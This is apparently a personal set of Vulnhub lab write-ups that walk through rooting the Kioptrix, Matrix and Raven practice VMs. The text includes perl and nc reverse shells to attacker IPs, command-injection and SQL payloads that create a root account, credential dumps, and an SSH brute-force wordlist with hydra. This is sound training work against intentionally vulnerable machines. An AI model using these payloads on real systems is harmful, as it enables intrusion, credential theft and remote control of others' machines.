Vulnhub practice
===
[TOC]

# Kioptrix 1

## NMAP

- Command: `sudo nmap -T4 -A -v -O 192.168.0.188`

## Looking for a usable exploit

`http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b`

- Search for exploits matching the `mod_ssl` and `OpenSSL` versions
  - openssl_too_open
    - http://www.voidcn.com/article/p-wwrkqqii-bdt.html
    - https://www.exploit-db.com/exploits/40347
    - Would not build; getting a working OpenSSL environment on macOS is painful...
  - openfuck
    - https://www.exploit-db.com/exploits/764
    - The exploit is old, but someone has patched it
      - https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
    - Still stuck on the OpenSSL environment, wtf

## Looking for other entry points

- `nmap -Pn --script vuln 192.168.0.188`

```
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
```

- Samba looks exploitable, so go back and check the Samba version. (The `smb-vuln-cve2009-3103` hit itself is a false positive: as the script's own text says, CVE-2009-3103 is a Windows `srv2.sys` bug, and this is a Red Hat box running Samba. The real signal is simply that SMB is exposed.)
  - Samba 2.2.1a
- Find an exploit for it
  - https://www.exploit-db.com/exploits/10
  - `gcc 10.c -o test`

## Win
- `./test -v -b 0 192.168.0.188` (`-b 0` selects the Linux target in the exploit's brute-force mode)
- Got a root shell
  - ![](https://i.imgur.com/m26QZOM.png)

# Kioptrix 2

## NMAP

![](https://i.imgur.com/0h3OGtB.png)

- Port 80 is open, so connect and see what it is
  - A strange login page
  - ![](https://i.imgur.com/STJ5taU.png)
- dirsearch for suspicious files
  - http://192.168.0.127/manual/index.html
  - Nothing else of interest
- sqlmap
  - `sqlmap -u "http://192.168.0.127/index.php" --data "uname=123&psw=123&btnLogin=Login" --risk 3`
  - It's injectable!

```
--dbs
available databases [1]:
[*] webapp

-D webapp --tables
Database: webapp
[1 table]
+-------+
| users |
+-------+

-D webapp -T users --columns
Database: webapp
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | numeric     |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

-D webapp -T users -C id,password,username --dump
Database: webapp
Table: users
[2 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | 5afac8d85f | admin    |
| 2  | 66lajGGbla | john     |
+----+------------+----------+
```

- With the credentials in hand, log in: there is a page that pings a host, which screams command injection
  - ![](https://i.imgur.com/UU9GGbP.png)
- Exploit
  - The form POSTs an `ip` parameter to http://192.168.0.127/pingit.php (see the captured request below)
  - `|ls` as the value confirms the injection
  - Check privileges with `|id`
    - uid=48(apache) gid=48(apache) groups=48(apache)
  - Unfortunately that still means escalating
  - Get a reverse shell first to make things easier

## Privilege escalation

- Reverse shell (the perl one-liner, then the same thing URL-encoded into the `ip` parameter)

```
perl -e 'use Socket;$i="192.168.0.60";$p=11221;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STD OUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

POST /pingit.php HTTP/1.1
Host: 192.168.0.127
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.127/pingit.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
Connection: close
Upgrade-Insecure-Requests: 1

ip=|perl+-e+'use+Socket%3b$i%3d"192.168.0.60"%3b$p%3d11221%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'&submit=submit
```

- `uname -a`
  - Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
- Look for a privesc exploit for `2.6.9-55.EL`
  - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-4347
    - Doesn't work!
  - https://github.com/SecWiki/linux-kernel-exploits/blob/master/2014/CVE-2014-3153/35370.c
    - Doesn't work!
  - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-4073
    - Doesn't work!
  - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2010/CVE-2010-3081
    - Doesn't work!
  - https://github.com/SecWiki/linux-kernel-exploits/tree/master/2009/CVE-2009-2698
    - Works!
  - Remember to work under /tmp, the one place the apache user can write the downloaded file

## Exploit and win

```
sh-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-3.00$ wget http://192.168.0.60:8021/36108.c
--17:07:21--  http://192.168.0.60:8021/36108.c
           => `36108.c'
Connecting to 192.168.0.60:8021... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,507 (2.4K) [text/plain]

    0K ..                                                    100%  170.78 MB/s

17:07:21 (170.78 MB/s) - `36108.c' saved [2507/2507]

sh-3.00$ gcc 36108.c -o 36108
sh-3.00$ ./36108
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00#
```

## Postscript: a good Linux privesc repo

- https://github.com/SecWiki/linux-kernel-exploits/

# Kioptrix 3

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 01:43 CST
Nmap scan report for 192.168.0.195
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
```

## The site

- It is LotusCMS
- Look for a vulnerability that gives RCE
  - There is one!
  - https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh

## exploit

The `page` parameter is evaluated by LotusCMS, so closing the string and appending a `${system("...")}` expression runs a command. URL-decoded, the payload is `page=index');${system("id")};#`.

```
http://192.168.0.195/index.php?page=index%27)%3B%24{system(%22id%22)}%3B%23

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

- Set up a reverse shell first

```
http://192.168.0.195/index.php?page=index%27)%3B%24{system(%22nc%20-e%20/bin/sh%20192.168.0.60%2011221%22)}%3B%23

uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
```

- As before, look for a privesc vulnerability
  - Spent ages on privesc and every attempt failed QQ
- `cat /etc/passwd`
  - There are other accounts, but no passwords for them
    - loneferret
    - dreg
- Look for passwords
  - `grep "password" /home/* -r`
  - Lots of output; go through it slowly
  - `/home/gallery/gconfig.php` contains DB credentials

## exploit via database

- /phpmyadmin is reachable; log in with those credentials
- There is an odd table
  - dev_account
  - It holds two accounts with password hashes; they look like MD5, so throw them at cmd5
    - loneferret/starwars
    - dreg/Mast3r
  - These are the accounts seen in `/etc/passwd` earlier
  - They work for SSH directly!
- Logged in as dreg: nothing of interest QQ
- Logged in as loneferret: there are odd files, so check them
  - `cat .bash_history` is the key
  - It shows `sudo ht`
  - Running `sudo ht` straight away works
  - The `ht` binary itself is owned by root
  - Use `ht` to open `/etc/sudoers`
    - It has indeed been edited so that loneferret may run ht as root
  - Since ht is running as root, it can rewrite `/etc/sudoers` itself
    - Add `/bin/bash` so that it can also be run as root
  - Last step
    - `sudo /bin/bash`
    - Root, win!

# Kioptrix 4

## nmap

```
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
```

## Port 80

- Another odd login form
- Inserting a single quote breaks it: SQL injection!
## SQLMAP

```
sqlmap -u "http://192.168.0.14/checklogin.php" --data "myusername=1&mypassword=2&Submit=Login"

sqlmap identified the following injection point(s) with a total of 409 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=1&mypassword=-8697' OR 1250=1250#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=1&mypassword=2' OR SLEEP(5)-- aIbA&Submit=Login
---
[10:28:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
```

`--os-shell` works; as expected it runs as www-data. Looking around the directories there are home directories for john and robert. Keep the backdoor sqlmap dropped for `--os-shell` around for later:

```
http://192.168.0.14/tmpbmjyj.php?cmd=ls
http://192.168.0.14/tmpbmjyj.php?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
```

So john's or robert's credentials are the priority (note that both have `/bin/kshell` as login shell, i.e. a restricted shell). Dump them straight from sqlmap:

```
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
```

## ssh

Logging in as robert lands in a restricted shell.

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ lists a few ways to break out of a restricted shell:

```
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
```

The second one is clearly the one for this shell; trying it works, escape successful!

## Attempting privesc

No good build environment at hand for this one, and the box has no gcc. Parked for now.

## back to sql injection

While fuzzing around, it turned out that `sys_exec` is callable (the `lib_mysqludf_sys` UDF is loaded):

```
john'UNION SELECT sys_exec('sleep 10'),2,3#
```

There is no output, but the command can write to /tmp, and we already have SSH to read it:

```
john'UNION SELECT sys_exec('id>/tmp/123'),2,3#
```

`cat` over SSH cannot read the file, because it was created as `root`: `sys_exec` runs system commands as root, which means the MySQL server itself is running as root. So just create a new root account:

```
# first create a file in /tmp to feed the password prompt
echo -e "meow\nmeow\n" > /tmp/meow

john'UNION SELECT sys_exec('useradd -ou 0 -g 0 meow'),2,3#
john'UNION SELECT sys_exec('cat /tmp/meow|passwd meow'),2,3#
```

## win

```
su meow
Password: meow
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
root@Kioptrix4:/tmp#
```

# Kioptrix 5

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 16:59 CST
Nmap scan report for kioptrix2014.host-only (10.37.129.3)
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
8080/tcp open  http-proxy
```

## 80 and 8080

- Port 80
  - The HTML hides one line
  - `<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">`
  - `pChart2.1.3/index.php` is a real page
- Port 8080
  - 403 Forbidden

## pChart2.1.3

- Use the LFI vulnerability
  - [https://www.exploit-db.com/exploits/31173](https://www.exploit-db.com/exploits/31173)
  - [http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd](http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd)
- No RCE found; PHP looked like it might give RCE, but nothing came of it
- Start fuzzing
  - The fuzzing list turned up a config file
    - `usr/local/etc/apache22/httpd.conf`
  - Read it to see why port 8080 returns 403
    - It filters on User-Agent
    - Setting `User-Agent: Mozilla/4.0` is enough

## phptax

- Port 8080 turns out to be phptax
- Use the RCE
  - [https://www.exploit-db.com/exploits/21665](https://www.exploit-db.com/exploits/21665)

```
GET /phptax/drawimage.php?pdf=make&pfilez=foo;sleep+5; HTTP/1.1
Host: 10.37.129.3:8080
User-Agent: Mozilla/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=uf74gaucdp687p4prlj1s954p1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```

- Nothing is echoed back
- Combine it with the `pChart2.1.3 LFI` to read the output
  - `id>/tmp/out.txt`
  - `http://10.37.129.3/pChart2.1.3/examples/index.php?Action=View&Script=/tmp/out.txt`
- The user is `www`, which can't do much on its own
- Look through `/bin` and `/usr/bin/`
  - `perl` is there, so use a perl reverse shell

## pwn & win

- Having a `shell` makes everything easier

```
perl -e 'use Socket;$i="10.37.129.2";$p=11221;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

- `uname -a`
  - `FreeBSD Kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64`
- Search the web for `FreeBSD 9.0 exploit`
  - [https://www.exploit-db.com/exploits/26368](https://www.exploit-db.com/exploits/26368)
  - The very first hit gave `root`, lucky www
- Transfer the file; `nc` is on the box, which is convenient
  - `nc -l 11221 < exploit.c` (on the attacker)
  - `nc 10.37.129.2 11221 > exploit.c` (on the target)
- `pwn` & `root`
  - `gcc exploit.c -o exploit`
  - `./exploit`
  - win

# Matrix

- nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 01:22 CST
Nmap scan report for 192.168.0.172
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
```

## Ports 80 & 31337

- Port 80
  - Tells me to follow the rabbit
  - The rabbit image: http://192.168.0.172/assets/img/p0rt_31337.png
  - The port scan already showed 31337 anyway, so this hint is a bit pointless
- Port 31337
  - dirsearch
    - assets is browsable, nothing suspicious in it
  - headers
    - nothing
  - Inspect the HTML
    - There is a base64 string
    - `ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=`
    - It decodes to `echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix`
    - Read as "this text was echoed into that file", the file should be sitting in the web root, so request it directly (honestly got stuck here for a while; it takes a bit of guesswork)
- Download `192.168.0.172:31337/Cypher.matrix`
  - The content is a Brainfuck program; anyone who has done enough CTFs recognises it on sight

```
+++++++++[->+++++++++<]>++++++++.<++++[->++++<]>++++++.++++++.<+++++++++[->---------<]>----.<++++++++[->++++++++<]>+++.--.<+++[->+++<]>++++.<++++++++[->--------<]>--------------.<++++++++[->++++++++<]>+++++.+++++++++.++++++.<+++[->---<]>------.<+++[->+++<]>++++.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>+++++++++.+++++.++++++.-----.<++++++++[->--------<]>---------------.<++++++++[->++++++++<]>+++++++++++++.<+++[->---<]>---.<++++[->++++<]>+++.--.---------.<+++[->+++<]>++++++.<+++++++++[->---------<]>-------.<++++++++[->++++++++<]>+.<++++[->++++<]>++.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>+++++++.<+++[->+++<]>+++++.<++++[->----<]>.<+++[->+++<]>+++++.+.<++++++++[->--------<]>--------.<+++[->---<]>---.<+++++++++[->+++++++++<]>++++++.<+++[->---<]>-----.<+++[->+++<]>++.<+++[->---<]>---.<++++++++[->--------<]>--------.<++++++++[->++++++++<]>++++++++++++++++.<+++[->---<]>------.<++++[->++++<]>++..++++.--------.+++.<+++[->---<]>-----.<++++++++[->--------<]>----.<++++++++[->++++++++<]>+++++++++++.<+++++++[->-------<]>---------.<+++++++[->+++++++<]>++++++++++..<+++++++[->-------<]>-----------.<++++++++[->++++++++<]>++.<+++++[->-----<]>-..<++++++++[->--------<]>-----------.---.<++++++++[->++++++++<]>++++.<+++++[->+++++<]>++++++++.+++++.<+++[->---<]>------.<++++++[->------<]>-------.<+++++[->-----<]>-.<+++++[->+++++<]>++++++++.<+++++[->+++++<]>+++++++++.<++++[->++++<]>+.+.<++++[->----<]>----.<+++[->+++<]>++..<+++[->+++<]>++++.<++++++++[->--------<]>-------------.<+++[->---<]>---.<++++++[->++++++<]>+++++.<++++++[->------<]>-----.<++++++++[->++++++++<]>++++++.+++++++++.+++.<+++[->---<]>--.--.<+++[->+++<]>++++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++++++.<+++[->---<]>--.<++++[->++++<]>++.+.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>+++.+++.--------.<++++++++[->--------<]>---------------.<++++++++[->++++++++<]>+++.+++++.-------.<++++[->++++<]>+.<++++[->----<]>-.++.<++++[->++++<]>+.<+++[->---<]>------.<+++[->+++<]>++++.+.<+++++++++[->---------<]>--.<+++++++++[->+++++++++<]>++.----.<++++++++[->--------<]>---------------.<++++++[->++++++<]>+++++.<++++++[->------<]>-----.<++++++++[->++++++++<]>++++++++.-------.<++++[->++++<]>+++++.<++++[->----<]>-.<++++++++[->--------<]>-----.<+++++++++[->+++++++++<]>+.<+++[->---<]>----.<+++[->+++<]>++.----.<+++[->---<]>--.++.++.-.<++++++++[->--------<]>----.<+++++++++[->+++++++++<]>++++++.<+++[->---<]>-----.<+++[->+++<]>++.<+++[->---<]>---.<++++++++[->--------<]>--------.<+++++++[->+++++++<]>+++++++..<+++++++[->-------<]>-------.<+++++++++[->+++++++++<]>+++.--.+++++++.<+++++++++[->---------<]>--------.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++++++++.+++++++++.<++++[->----<]>--.++++++++.<++++++++[->--------<]>-----------.<++++++++[->++++++++<]>+.<+++[->+++<]>++++.<+++[->---<]>-.<++++++++[->--------<]>----.<++++++++[->++++++++<]>++++++.+++.+++++.<+++[->---<]>-.<++++++++[->--------<]>----.<++++++++[->++++++++<]>+++.<+++[->+++<]>+++.+++..<+++[->---<]>----.--.<++++[->++++<]>+.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++.+.--.---------.+++++.-------.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++++++++.---------.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++++++++++++.<+++[->---<]>------.<++++[->++++<]>++..++++.--------.+++.<+++[->---<]>-----.<+++++++[->-------<]>-----.<+++++[->-----<]>--------.---.<
```

- Running it gives a message
  - `You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password`
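Decoding `Cypher.matrix` offline instead of pasting it into a web tool. The interpreter below is an added example (not the page's or the challenge author's code): 8-bit wrapping cells, a precomputed bracket jump table, and a step limit so a malformed blob raises instead of hanging. `SAMPLE` is a constructed input, the opening of the program above, which prints `You can`; run it on the real file with `python3 bf.py Cypher.matrix`.

```python
"""Minimal Brainfuck interpreter for decoding CTF blobs such as Cypher.matrix.
Added example, not part of the original write-up."""
import sys

COMMANDS = "<>+-.,[]"


def build_jump_table(code: str) -> dict:
    """Map every '[' to its matching ']' and back; unbalanced brackets are an error."""
    stack, table = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            table[start], table[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return table


def run_brainfuck(code: str, stdin: bytes = b"", tape_size: int = 30000,
                  max_steps: int = 50_000_000) -> str:
    """Execute `code` and return everything it printed (decoded as latin-1).

    Cells are unsigned 8-bit and wrap; ',' reads one byte from `stdin` (0 at EOF);
    the step limit turns a runaway loop into an exception instead of a hang."""
    code = "".join(ch for ch in code if ch in COMMANDS)  # anything else is a comment
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    ptr = pc = inp = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; runaway loop?")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # jump back to the matching '['
        pc += 1
    return out.decode("latin-1")


# Constructed sample: the opening of the Cypher.matrix program, which prints "You can".
SAMPLE = (
    "+++++++++[->+++++++++<]>++++++++.<++++[->++++<]>++++++.++++++."
    "<+++++++++[->---------<]>----.<++++++++[->++++++++<]>+++.--."
    "<+++[->+++<]>++++."
)


def decode_file(path: str) -> str:
    """Decode a Brainfuck program stored in a file (e.g. the downloaded Cypher.matrix)."""
    with open(path, encoding="latin-1") as fh:
        return run_brainfuck(fh.read())


if __name__ == "__main__":
    print(decode_file(sys.argv[1]) if len(sys.argv) > 1 else run_brainfuck(SAMPLE))
```

Non-command characters are dropped before execution, so the file can be fed in as downloaded, trailing newline and all.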
## Brute-forcing the SSH password

- Use hydra

```
# build the wordlist: k1ll0r followed by every two-character [a-zA-Z0-9] suffix
for i in {{a..z},{A..Z},{0..9}}; do for j in {{a..z},{A..Z},{0..9}}; do echo "k1ll0r"$i$j>>wordlist;done;done

hydra -l guest -P wordlist ssh://192.168.0.172

Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-18 01:02:45
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.0.172:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://guest@192.168.0.172:22
[INFO] Successful, password authentication is supported by ssh://192.168.0.172:22
[22][ssh] host: 192.168.0.172   login: guest   password: k1ll0r7n
[STATUS] attack finished for 192.168.0.172 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
```

## ssh login

- It drops into rbash
  - Annoying
  - A quick search shows that asking ssh for a command of your own when connecting bypasses it
  - `ssh guest@192.168.0.172 -t bash`
  - Success!

## root & win

- `sudo -l`

```bash
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
```

- `(ALL) ALL` means a plain `sudo su` (with guest's own password) is enough
  - root
- `cat /root/flag`
- win.

## Postscript

- A good tool for generating wordlists
  - mp64, to look into
- Other ways out of rbash
  - via vi
- Other ways to root
  - `sudo /usr/bin/bash`

# Raven 1

## nmap

```
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 09:32 CST
Nmap scan report for 172.20.10.2
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds
```

## 80

- Port 80 hosts a web application
- dirsearch
  - `/.DS_Store` looks the most promising
  - `/img` and `/js` are browsable
  - There is a `/wordpress/`

## wordpress

- WordPress means running the open-source vulnerability scanner against it
- `wpscan --url raven.local/wordpress -evp -evt -eu`

```
[i] User(s) Identified:

[+] michael
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] steven
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

- Try SSH
  - michael/michael
  - Success!

## michael shell

- https://www.exploit-db.com/exploits/40839
  - Failed
- Tried several privesc exploits, all failed QQ
- WordPress means there is a database
- Look at the other user's password first
- `cat wp-config.php | head -n 30`

```
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
```

- Log in to MySQL
  - `mysql -u root -pR@v3nSecurity`
- Dump the password hashes

```
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> show columns from wp_users;
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field               | Type                | Null | Key | Default             | Extra          |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID                  | bigint(20) unsigned | NO   | PRI | NULL                | auto_increment |
| user_login          | varchar(60)         | NO   | MUL |                     |                |
| user_pass           | varchar(255)        | NO   |     |                     |                |
| user_nicename       | varchar(50)         | NO   | MUL |                     |                |
| user_email          | varchar(100)        | NO   | MUL |                     |                |
| user_url            | varchar(100)        | NO   |     |                     |                |
| user_registered     | datetime            | NO   |     | 0000-00-00 00:00:00 |                |
| user_activation_key | varchar(255)        | NO   |     |                     |                |
| user_status         | int(11)             | NO   |     | 0                   |                |
| display_name        | varchar(250)        | NO   |     |                     |                |
+---------------------+---------------------+------+-----+---------------------+----------------+
10 rows in set (0.00 sec)

mysql> select user_nicename,user_pass from wp_users;
+---------------+------------------------------------+
| user_nicename | user_pass                          |
+---------------+------------------------------------+
| michael       | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 |
| steven        | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ |
+---------------+------------------------------------+
2 rows in set (0.00 sec)
```

- Throw them at cmd5 to crack
  - https://www.cmd5.com
  - `$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/`
    - pink84

## ssh & win

- SSH in as steven
- `sudo -l`

```
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
```

- Python under sudo, very happy
- Kioptrix 4 had the restricted-shell problem; same trick again
  - Recap

```
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
```

- Escalate and get the flag

```
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@Raven:/home/steven# id
